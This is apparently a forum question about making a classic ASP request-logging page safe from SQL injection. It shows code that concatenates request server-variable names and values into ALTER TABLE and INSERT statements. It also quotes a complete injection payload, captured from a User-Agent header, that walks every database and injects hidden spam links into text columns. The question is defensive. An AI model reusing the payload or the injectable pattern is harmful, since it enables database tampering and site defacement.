# Dynamic SQLs While Still Using Parameters

Tags: sql-server-2008, asp-classic, sql-injection

**Summary**: Web app has a SQL statement that is dynamically generated because it can have a variable number of columns each time because the table can have new columns added.

Need to know how to do that using a stored procedure or prepared statement so that it is SQL injection safe.

**Detail**: I'm working with a specific web app which sole purpose is to log the request server variables collection to a table. 1 row per request, 1 column per server variable. Since count of server variables can change e.g. if request has a custom header, etc. To handle this, it checks columns, adds new one(s) if necessary:

```
    '1 - ensure table columns are adequete and add new cols if necessary
    Set oSchema = Server.CreateObject("Scripting.Dictionary")
    Set oRsCols = oConn.Execute("SELECT ORDINAL_POSITION, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'REQUESTS'")

    Do While Not oRsCols.EOF
        oSchema.Add oRsCols("COLUMN_NAME").value, oRsCols("ORDINAL_POSITION").value 'add dictionary row
        oRsCols.MoveNext
    Loop
    Set oRsCols = Nothing

    'grab this request's server vars collection, and if a new one is found, add a column to table for it
    For Each serverVariable In Request.ServerVariables
        If len(oSchema(servervariable)) = 0 Then 'a new variable in the collection
            oConn.execute("ALTER TABLE REQUESTS ADD " & serverVariable & " VARCHAR(8000) NULL")
        End If  
    Next
```

It then compiles the SQL statement dynamically e.g. `INSERT INTO TABLE (...) VALUES (...)` as follows:

```
    '2 - now that the table is good, compile the insert statement
    sColString = ""
    sValuesString = ""

    For Each serverVariable In Request.ServerVariables
        sCurrentVariable = serverVariable
        sCurrentVariableValue = request.ServerVariables(serverVariable)
        sColString = sColString & sCurrentVariable & ", "

        If checkNull(sCurrentVariableValue) Then
            sValuesString = sValuesString & "NULL, "
        Else
            sValuesString = sValuesString & "'" & sCurrentVariableValue & "'"  & ", "
        End If
    Next 

    'handle trailing commas
    sColString = replace(sColstring & "!@#", ", !@#", "") & ", DB_INSERT_DATE"
    sValuesString = replace(sValuesString & "!@#", ", !@#", "") & ", GETDATE()"

    oConn.execute("INSERT INTO REQUESTS (ASP_SESSION_ID, " & sColString & ") OUTPUT INSERTED.ID VALUES (" & nvl(Session.SessionID, "NULL") & ", " &  sValuesString & ")")
```

Columns and values are compiled on the fly in the web app (since the count of columns can vary each time, and column list can grow e.g. if a new custom server variable is encountered).

This is the only type of SQL I have not been able to figure out how to properly convert to a stored procedure or parameterized query (again, because columns and column counts are not known and vary e.g. since different requests can generate different server variables e.g. a custom server variable, the app adds a new column to the table if a new server variable is found. It then loops through each variable and compiles a sql statement.)

I am obvously worried about SQL injection, since this method is vulnerable. I often see HTTP_USER_AGENT values coming through like this (which didn't succeed here, but still...):

`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">blah blah spam <a href="http://www.spam-example.com">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''some spam'''' when 1 then ''''read'''' else ''''some spam'''' end +''''</a> blah blah</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--`

**How can I achieve this while having an injection-safe method of inserting the row?**

Comment: Is this obsolete ASP technology? Before .NET was created? Don't... just don't. Change the code or something.
Upgrade to ASP .NET and use proper parameterized queries (AKA prepared statements)

Comment: Classic ASP has parameterized queries. My question is how to do a parameterized query when the columns and column count aren't known in advance

Comment: Do you mean dynamic select statements? You can't do it securily...
If you get column name from the client side, you're vulnerable to sql injection. You can either prepare any possible query in advance, or map any possible column and table to an index, and recieve index number from the client. This is not the best option as I do recommend to upgrade to .NET with real parameterized queries, but it would be sufficient for your current needs.